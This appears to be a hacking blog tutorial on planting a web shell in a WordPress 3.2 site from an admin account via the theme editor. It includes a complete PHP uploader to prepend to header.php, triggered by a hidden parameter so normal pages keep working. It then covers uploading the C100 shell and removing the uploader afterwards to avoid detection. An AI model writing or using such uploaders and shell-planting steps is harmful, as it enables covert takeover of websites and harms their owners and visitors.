In this short article I will walk through how to embed a web shell in a WordPress site without using any plugins.
I did this on localhost, at the URL http://wordpress.localhost, running WordPress version 3.2. For other versions, try it and see ...
The starting point is an admin account on the target WordPress site. How you get it (SQL injection, social engineering, whatever) is not the point here; what matters is that the credentials get you into the admin Dashboard.
So, let's start ..
Log in to the admin panel at http://wordpress.localhost/wp-login.php
Enter the username and password for the WordPress account. After a successful login you are taken to the admin Dashboard, as in the screenshot below.
Once you are in, go to Appearance --> Editor and pick a file to edit. In this example we pick header.php, as in the picture below. (If the site's wp-config.php defines DISALLOW_FILE_EDIT as true, the Editor entry is missing from the menu and this route is closed.)
Now paste a small PHP uploader script, one that lets you upload a shell to the site, at the very beginning of header.php. Here is an example file:
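As an added example (this is my own snippet, not the file from the original post, which is not reproduced here), a minimal uploader that can be pasted at the top of header.php. The query parameter u and the form field name f are my own choices. The script only acts when one of them is present and then stops with exit, so the rest of header.php (which needs WordPress loaded) never runs on a direct request, and ordinary page rendering is not broken when the parameters are absent. dirname(__FILE__) is used instead of __DIR__ because WordPress 3.2 still ran on PHP 5.2.

```php
<?php
// Added example: uploader to prepend to wp-content/themes/twentyeleven/header.php.
// header.php is included on every front-end render, so the handler only fires
// when the request carries ?u=1 or a file upload named "f" (assumed names);
// otherwise it falls through to the normal theme code.
if (isset($_GET['u']) || isset($_FILES['f'])) {
    if (isset($_FILES['f']) && $_FILES['f']['error'] === UPLOAD_ERR_OK) {
        // Drop the file next to this script, i.e. into the theme directory.
        $dest = dirname(__FILE__) . '/' . basename($_FILES['f']['name']);
        if (move_uploaded_file($_FILES['f']['tmp_name'], $dest)) {
            echo 'OK: ' . htmlspecialchars(basename($dest));
        } else {
            // The web server user must be able to write to the theme directory;
            // being able to save header.php from the editor only proves the file is writable.
            echo 'FAILED: theme directory not writable';
        }
    } else {
        // No upload yet: show the form. It posts back to the same URL.
        echo '<form method="post" enctype="multipart/form-data">'
           . '<input type="file" name="f"> <input type="submit" value="up">'
           . '</form>';
    }
    // Stop here so the theme's own header code (language_attributes(), bloginfo(), ...)
    // is not reached on a direct request, where WordPress is not loaded.
    exit;
}
?>
```

With this in place, the form is reached at http://wordpress.localhost/wp-content/themes/twentyeleven/header.php?u=1, and anything uploaded lands in the twentyeleven directory.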
Then click Update File and check for the message "File edited successfully". Note the URL that is shown:
it tells us the file lives at /wp-content/themes/twentyeleven/header.php,
as shown in the picture below.
So the URL of the uploader is: http://wordpress.localhost/wp-content/themes/twentyeleven/header.php
All that remains is to upload a web shell, for example C100.
To reach the uploaded shell, browse to the twentyeleven folder, since that is where the uploader writes it.
and ... here is the result:
Bingo, we have our web shell ..
DO NOT FORGET TO REMOVE THE UPLOADER FROM header.php. Because header.php is included on every front-end page, the uploader is reachable (and shows up in the file's modification time) for as long as it stays there.
Happy Hacking ...
9:41 AM -NGELIH-